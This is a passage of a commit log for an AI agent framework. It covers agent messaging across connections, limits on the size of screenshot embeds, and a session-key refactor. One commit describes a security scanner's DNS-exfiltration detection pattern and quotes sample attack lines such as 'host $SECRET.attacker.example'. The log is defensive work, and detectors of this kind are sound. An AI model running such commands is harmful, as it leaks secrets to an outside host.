(local, remote URL, SSH, Hermes Cloud, docker) is now message_agent-
reachable. The Desktop relays over the persistent sockets it already
holds — roster sync per connection, envelope drain/deliver/reply loops —
so cross-connection DMs work exactly like local ones, replies included.

Also fixes the legacy-SOUL gate bug: profiles whose SOUL.md carries the
old plugin-appended protocol silently lost the message_agent tool
because the injection/execution gates keyed on protocol-section
non-emptiness instead of managed-install.
2026-08-23 02:16:11 -07:00
kshitijk4poor dff84f1890 fix(browser): cap browser_vision native embeds for history reuse
browser_vision's native fast path base64-encoded screenshots at full
resolution and baked them into the tool result uncapped — the exact
sibling of the vision_analyze path #92699 fixed. Apply the same
proactive 256KB/1568px resize before the embed enters reusable history.

Fail-open by design: without Pillow the resize helper falls back to raw
bytes and the compressor's keep-newest pass still retires stale embeds.

Sibling-gap follow-up for the #92725 salvage; the shared-cap approach
mirrors the policy-owner idea from #92748.

Co-authored-by: joaomarcos <joaomarcosdias444@gmail.com>
2026-08-23 13:27:04 +05:30
HexLab98 21a93f0a67 fix(vision): size native embeds for history reuse
vision_analyze baked up to 4 MB / 7900px screenshots into immutable
history, so every later turn re-sent ~400K chars. Cap embeds at 256 KB
and 1568px (the long edge models actually read) so screenshot QA no
longer blows the context.
2026-08-23 13:27:04 +05:30
sovthpaw 13f4cfebfa fix(skills_guard): --host flags no longer flagged as DNS exfiltration
The dns_exfil pattern matched the 'host' DNS command inside flag names
like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin
shipping a .sh launcher script was blocked as dangerous. A negative
lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup
exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...))
still trips the pattern.

Salvaged from PR #92382 (regex fix + regression test); scan-scoping
half rejected separately.
2026-08-22 11:15:44 -07:00
kshitijk4poor 8e475ed27b refactor(terminal): extract _current_session_key() helper for session-key lookups
Follow-up to the session-scoping fix: _get_sudo_password_cache_scope()
and _resolve_container_task_id() carried byte-identical copies of the
HERMES_SESSION_KEY lookup (contextvar + os.environ fallback). Collapse
both onto one helper adopting the bare-import convention approval.py
already uses — get_session_env() implements the fallback internally, so
the old try/except could only fire on import failure, where silently
degrading to process-global semantics would reintroduce exactly the
cross-session contamination the fix prevents.
2026-08-22 15:07:05 +05:30